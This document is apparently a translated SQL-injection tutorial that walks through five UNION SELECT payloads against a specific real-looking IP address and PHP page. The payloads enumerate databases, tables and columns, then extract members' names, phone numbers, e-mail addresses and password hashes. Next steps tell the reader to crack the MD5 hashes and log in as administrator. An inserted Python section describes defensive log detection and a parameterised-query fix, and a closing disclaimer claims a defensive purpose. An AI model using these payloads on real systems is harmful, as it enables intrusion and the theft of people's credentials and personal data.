#### 1. Obtain the names of all databases on the current connection

https://61.206.45.132/corp/tokusyu.php ?page=2 &cnt_all=100 &tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( schema_name,char(10),’’,char(10),’’,char(10),’’,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.schemata limit 1,10— &mid=1

#### 2. Obtain the names of all tables in the current database

Obtain every table in the current database, the database each table belongs to, each table's row count, and each table's comment.

https://61.206.45.132/corp/tokusyu.php ?page=2 &cnt_all=100 &tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() limit 1,10—

#### 3. Find the table that is likely to hold the web back-end administrator password

Obtain every table in the current database, the database each table belongs to, each table's row count, and each table's comment.

https://61.206.45.132/corp/tokusyu.php ?page=2 &cnt_all=100 &tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( table_schema,char(10),table_name,char(10),table_rows,char(10),table_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.tables where table_schema=database() and table_name>=‘a’ and table_name<‘b’ limit 1,10—

#### 4. Obtain all columns of the user table

Obtain every column of the user table, the number of columns, and each column's comment.

https://61.206.45.132/corp/tokusyu.php ?page=2 &cnt_all=100 &tksid=473 and 1=2 union select 1,2,3,4,5,6,7,8,9,concat( table_schema,char(10),table_name,char(10),column_name,char(10),column_comment,char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from information_schema.columns where table_schema=database() and table_name=‘member’ limit 1,10—

#### 5. Obtain the web back-end administrator's username, password, e-mail address and other sensitive information

union select 1,2,3,4,5,6,7,8,9,concat(ifnull(MEMBER_NAME,’null’),char(10),ifnull(MOBILE,’null’),char(10),ifnull(E_MAIL,’null’),char(10),ifnull(PWD,’null’),char(10)),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 from ZAKKANET.MEMBER limit 1,10—
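From the defender's side, every one of steps 1 to 5 has the same shape: a numeric id parameter is followed by a tautology, a `UNION SELECT` column-padding list, a read from `information_schema`, and a trailing comment. The Python below is an added example, not part of the original tutorial or of the site it targets: it scans constructed access-log lines (the host, the `/app/list.php` path, the client addresses and the third request are made up) for that pattern, and then shows why binding the id as a query parameter instead of splicing it into the SQL text stops the enumeration. The `items` table is an assumed stand-in for whatever the real endpoint selects.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qsl

# Constructed sample of an access log in Apache "combined"-like format.  The host,
# path, client addresses and the third request are made up; the second request's
# tksid value is shaped like the UNION / information_schema payloads described above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:00:00:01 +0000] "GET /app/list.php?page=2&cnt_all=100&tksid=473 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:00:00:02 +0000] "GET /app/list.php?page=2&cnt_all=100&tksid=473+and+1%3D2+union+select+1,2,3,schema_name+from+information_schema.schemata+limit+1,10-- HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:00:00:03 +0000] "GET /app/list.php?page=3&cnt_all=50&tksid=474 HTTP/1.1" 200 4801
"""

REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/'
)

# Each rule names one ingredient of the enumeration technique shown on this page.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b", re.I
    ),
    "tautology": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b", re.I),
    "trailing_comment": re.compile(r"(?:--|#)\s*$"),
}


def findings_for(value: str) -> list:
    """Names of the rules that match one URL-decoded parameter value."""
    return [name for name, rx in RULES.items() if rx.search(value)]


def is_schema_enumeration(findings) -> bool:
    """Every payload on the page pairs UNION SELECT with a read of information_schema;
    requiring both keeps ordinary text such as the word 'union' in a search box quiet."""
    return "union_select" in findings and "information_schema" in findings


def scan_access_log(text: str) -> list:
    """Return one record per request parameter that trips at least one rule."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl URL-decodes each value once, so %3D and '+' are restored before matching.
        for param, value in parse_qsl(query, keep_blank_values=True):
            found = findings_for(value)
            if found:
                hits.append({
                    "line": line_no,
                    "client": m.group("client"),
                    "param": param,
                    "findings": found,
                    "schema_enumeration": is_schema_enumeration(found),
                })
    return hits


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for whatever the page's tksid selects."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO items VALUES (473, 'sample item')")
    return conn


def lookup_item_safely(conn: sqlite3.Connection, tksid: str) -> list:
    """Mitigation: the value is bound as data, never spliced into the SQL text, so an
    appended UNION SELECT is compared as a literal string and selects nothing."""
    return conn.execute("SELECT id, title FROM items WHERE id = ?", (tksid,)).fetchall()


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
    conn = make_demo_db()
    print(lookup_item_safely(conn, "473"))
    print(lookup_item_safely(conn, "473 and 1=2 union select 1,2 from information_schema.schemata--"))
```

Running the block reports the second request (client 10.0.0.5, parameter `tksid`) with all four rules matched and `schema_enumeration` set, while the two ordinary requests produce nothing; the parameterised lookup returns the row for `"473"` and an empty result for the injected string. The detector only sees what reaches the log, so it is a complement to the parameterised query, not a replacement for it.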

Next step 1: compare the password MD5 hashes to obtain the plaintext password. Next step 2: log in to the web back-end as the administrator.

Warning: any privilege escalation or successful intrusion into a back-end is illegal and is not the purpose of this tutorial. This tutorial studies how intrusions work in order to defend against them; anyone who breaks into a website's back-end bears full responsibility for the consequences.